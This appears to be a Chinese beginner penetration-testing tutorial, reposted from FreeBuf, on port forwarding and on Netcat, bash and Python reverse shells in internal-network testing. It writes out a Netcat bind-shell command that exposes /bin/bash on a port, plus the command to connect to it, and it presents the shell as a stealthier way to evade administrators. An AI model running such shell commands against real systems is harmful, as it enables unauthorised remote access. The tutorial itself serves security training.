新手渗透测试训练营 – 端口转发&Shell反弹 – 作者:DigApis

渗透测试,是一个非常宽泛的概念,主要是指渗透测试人员从一个攻击者的角度出发,检查目标系统的安全性。其根本目的是获取webshell,从而可以进行有关渗透测试的操作。

安全渗透作为一种进行信息安全风险评估的一种手段,其渗透的过程可以分为三个阶段:

1.       信息收集

信息收集阶段,主要获取目的网站的外部信息,包括域名信息,IP信息,CDN信息等等。

2.       前渗透:

前渗透即获取权限之前的渗透行为。这一阶段主要目的是寻找可利用的漏洞,以获取shell。

3.       后渗透

后渗透即获取权限之后的渗透行为。

内网渗透属于后渗透的一部分,由于最近在整理内网渗透的相关内容,所以想要先来介绍一下内网渗透的内容。想要进行内网渗透在内的安全渗透,所需的知识多而杂。想要成为一个合格的从业者,需要学习的内容会比较零散,不成体系。多种多样,千变万化的渗透技巧,又经常让人感到非常混乱。所以我计划将内网渗透的内容整理成一系列文章,希望可以帮到对此感兴趣的人。如果我理解的内容出现偏差和错误,希望大家可以指出。

内网渗透的主要流程:

1. 内网信息收集

2. 获取shell

3. 提权

在渗透过程中,想要直接在目标机服务器内部进行操作,有可能需要经过几次跳转,这会导致我们在内网的操作非常慢,也很容易被管理员发现。将shell转发到外网的话,执行命令的速度会稍微快一点,也更加隐蔽。因此获取shell会让我们的操作便利很多。

端口转发的两个概念

1.       正向转发:

攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。

2.       反向转发:

被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。

内网转发的经典姿势

1  LCX端口转发

公网机器上利用Lcx进行监听,监听1234端口,并转发到50386端口。50386是监听主机未被占用的端口。

lcx1.png

将内网远程连接端口转发到监听主机开放端口的。

lcx2.png

利用远程桌面连接127.0.0.1:50386。

lcx3.png

lcx4.png2      Netcat反弹shell

第一种情况

a)      远程主机(注:假设IP地址为 192.168.85.136)上运行 :nc -l -p 1998 -t-e /bin/bash 192.168.85.138

意为绑定远程主机的 bash到1998端口,当本地主机连接远程主机成功时就会返回给本地主机一个terminal。
nc1.pngb)      在本地主机上运行 nc 192.168.85.136 1998,连接已经将 termimal重定向到 1998 端口的远程主机。远程主机ip为192.168.85.136。
nc2.png

 第二种情况

a)      在windows主机执行

nc3.png

b)      Linux端弹出shell

nc4.png

3     bash反弹shell

远程:
bash1.png

0>&1就是把0对应的设备改成的1对应的设备。

本地:

本地利用nc监听2018端口。

bash2.png

4.       Python一句话反弹shell

本地,利用nc监听1998端口,获得shell
py1.png

在目的服务器执行python脚本,转发shell。

py2.png反弹shell之后,就可以尝试内网渗透或提权的操作啦!

不管那种方式,反弹shell的过程都差不多:打开服务器的端口,用本地主机连接远程主机的端口。或者是把远程主机的端口转发到本地主机。不管哪种方式,都是对端口进行操作,主要需要理解原理,大家也可以尝试创造新的弹shell操作。

安全渗透的方式千变万化,并没有固定的套路,我这里只提出其中几种作为样例,希望通过这几个样例,可以让大家对端口转发操作有一个较直观的认识。

*本文作者:EVA。本文属北京丁牛科技原创出品,转载请注明来自FreeBuf.COM。

来源:freebuf.com 2018-07-26 19:13:35 by: DigApis

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论